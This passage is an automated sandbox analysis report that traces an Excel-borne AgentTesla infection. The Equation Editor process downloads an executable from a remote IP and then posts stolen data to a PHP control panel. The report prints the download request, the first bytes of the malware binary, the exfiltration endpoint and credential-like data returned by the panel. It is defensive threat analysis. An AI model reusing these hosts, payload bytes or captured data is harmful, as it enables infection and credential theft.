                                Nov 20, 2020 11:17:08.077490091 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077492952 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077507019 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077507019 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077523947 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077527046 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077543974 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077553988 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077565908 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077579975 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077591896 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077598095 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077604055 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077615976 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077621937 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077634096 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077635050 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077650070 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077653885 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077668905 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077670097 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077686071 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077687979 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077701092 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077704906 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077717066 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077724934 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077739954 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077753067 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.080614090 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.224431038 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224472046 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224494934 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224519014 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224540949 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224567890 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224596977 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224621058 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.224637985 CET8049167192.210.214.146192.168.2.22

                                HTTP Request Dependency Graph

                                • 192.210.214.146

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249167192.210.214.14680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Nov 20, 2020 11:17:07.482589960 CET0OUTGET /new.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 192.210.214.146
                                Connection: Keep-Alive
                                Nov 20, 2020 11:17:07.635740995 CET1INHTTP/1.1 200 OK
                                Date: Fri, 20 Nov 2020 18:17:06 GMT
                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                Last-Modified: Thu, 19 Nov 2020 03:02:21 GMT
                                ETag: "90400-5b46cf4ddb48f"
                                Accept-Ranges: bytes
                                Content-Length: 590848
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e e0 b5 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 f6 08 00 00 0c 00 00 00 00 00 00 3e 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 34 42 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 14 09 00 57 00 00 00 00 20 09 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 f5 08 00 00 20 00 00 00 f6 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 4e 08 00 00 00 20 09 00 00 0a 00 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 02 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 09 00 00 00 00 00 48 00 00 00 02 00 05 00 10 af 08 00 d4 65 00 00 03 00 00 00 10 00 00 06 10 3c 00 00 00 73 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 27 00 00 70 80 04 00 00 04 2a 1e 02 7b 25 00 00 0a 2a 1e 02 7b 26 00 00 0a 2a 1e 02 7b 27 00 00 0a 2a 72 02 28 07 00 00 0a 02 03 7d 25 00 00 0a 02 04 7d 26 00 00 0a 02 05 7d 27 00 00 0a 2a 1e 02 7b 35 00 00 0a 2a 1e 02 7b 36 00 00 0a 2a 56 02 28 07 00 00 0a 02 03 7d 35 00 00 0a 02 04 7d 36 00 00 0a 2a d2 20 fc 8d 04 4e 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 35 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 36 00 00 0a 6f 30 00 00 0a 58 2a 4a 02 73 3c 00 00 0a 03 73 42 00 00 0a 6f 32 00 00 0a 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0f 00 00 04 2a
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL._> @ `4B@W N@ H.textD `.rsrcN @@.reloc@@B He<s6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r'p*{%*{&*{'*r(}%}&}'*{5*{6*V(}5}6* N )UUZ(){5o/X )UUZ(+{6o0X*Js<sBo2*{*"}*{*"}*{*"}*{*"}*{*


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249168192.210.214.14680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Nov 20, 2020 11:17:32.797498941 CET622OUTPOST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                Content-Type: application/x-www-form-urlencoded
                                Host: 192.210.214.146
                                Content-Length: 364
                                Expect: 100-continue
                                Connection: Keep-Alive
                                Nov 20, 2020 11:17:32.954180002 CET622INHTTP/1.1 100 Continue
                                Nov 20, 2020 11:17:33.127294064 CET622INHTTP/1.1 200 OK
                                Date: Fri, 20 Nov 2020 18:17:32 GMT
                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                X-Powered-By: PHP/7.2.34
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.2249169192.210.214.14680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Nov 20, 2020 11:18:33.325546980 CET623OUTPOST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                Content-Type: application/x-www-form-urlencoded
                                Host: 192.210.214.146
                                Content-Length: 364
                                Expect: 100-continue
                                Nov 20, 2020 11:18:33.485141993 CET623INHTTP/1.1 100 Continue
                                Nov 20, 2020 11:18:33.659421921 CET624INHTTP/1.1 200 OK
                                Date: Fri, 20 Nov 2020 18:18:32 GMT
                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                X-Powered-By: PHP/7.2.34
                                Content-Length: 0
                                Content-Type: text/html; charset=UTF-8


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.2249170192.210.214.14680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Nov 20, 2020 11:18:44.008869886 CET625OUTPOST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                Content-Type: application/x-www-form-urlencoded
                                Host: 192.210.214.146
                                Content-Length: 586
                                Expect: 100-continue
                                Nov 20, 2020 11:18:44.156485081 CET625INHTTP/1.1 100 Continue
                                Nov 20, 2020 11:18:44.316761017 CET626INHTTP/1.1 200 OK
                                Date: Fri, 20 Nov 2020 18:18:43 GMT
                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                X-Powered-By: PHP/7.2.34
                                Content-Length: 365
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 5b 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 76 4f 67 6d 6c 4a 79 72 2e 22 2c 22 25 30 41 79 6d 54 59 32 44 56 67 59 70 52 55 22 2c 22 25 30 41 6c 43 6b 33 45 43 38 6a 6f 22 5d 2c 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 3a 2f 2f 6f 30 56 4f 6b 6e 53 54 69 36 6f 73 34 4b 47 50 6c 54 2e 6e 65 74 22 2c 22 4a 71 43 4d 6a 35 4b 37 65 37 4b 73 34 33 64 22 2c 22 54 39 63 79 75 62 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 73 69 7a 65 6f 66 28 29 3a 20 50 61 72 61 6d 65 74 65 72 20 6d 75 73 74 20 62 65 20 61 6e 20 61 72 72 61 79 20 6f 72 20 61 6e 20 6f 62 6a 65 63 74 20 74 68 61 74 20 69 6d 70 6c 65 6d 65 6e 74 73 20 43 6f 75 6e 74 61 62 6c 65 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 77 65 62 70 61 6e 65 6c 2d 6d 61 6a 6f 72 62 6f 79 31 5c 69 6e 63 5c 38 64 37 62 34 34 32 32 39 31 63 63 65 33 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                Data Ascii: [["JDownloader","vOgmlJyr.","%0AymTY2DVgYpRU","%0AlCk3EC8jo"],["Internet Download Manager","http://o0VOknSTi6os4KGPlT.net","JqCMj5K7e7Ks43d","T9cyub"]]<br /><b>Warning</b>: sizeof(): Parameter must be an array or an object that implements Countable in <b>C:\xampp\htdocs\webpanel-majorboy1\inc\8d7b442291cce3.php(12) : eval()'d code</b> on line <b>127</b><br />
                                Nov 20, 2020 11:18:44.583986998 CET626OUTPOST /webpanel-majorboy1/inc/8d7b442291cce3.php HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                Content-Type: application/x-www-form-urlencoded
                                Host: 192.210.214.146
                                Content-Length: 8866
                                Expect: 100-continue
                                Nov 20, 2020 11:18:44.732094049 CET627INHTTP/1.1 100 Continue
                                Nov 20, 2020 11:18:45.166305065 CET636INHTTP/1.1 200 OK
                                Date: Fri, 20 Nov 2020 18:18:43 GMT
                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                X-Powered-By: PHP/7.2.34
                                Content-Length: 0
                                Content-Type: text/html; charset=UTF-8


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:11:16:58
                                Start date:20/11/2020
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase:0x13f270000
                                File size:27641504 bytes
                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:11:17:18
                                Start date:20/11/2020
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                Imagebase:0x400000
                                File size:543304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:11:17:21
                                Start date:20/11/2020
                                Path:C:\Users\Public\vbc.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\Public\vbc.exe'
                                Imagebase:0x30000
                                File size:590848 bytes
                                MD5 hash:120A53A6B152CF6CED8ED708B2F2A033
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2190995416.00000000008E2000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2194644538.0000000003F00000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 35%, Metadefender, Browse
                                • Detection: 62%, ReversingLabs
                                Reputation:low

                                General

                                Start time:11:17:26
                                Start date:20/11/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase:0xe30000
                                File size:64672 bytes
                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:moderate

                                Disassembly

                                Code Analysis

                                Reset < >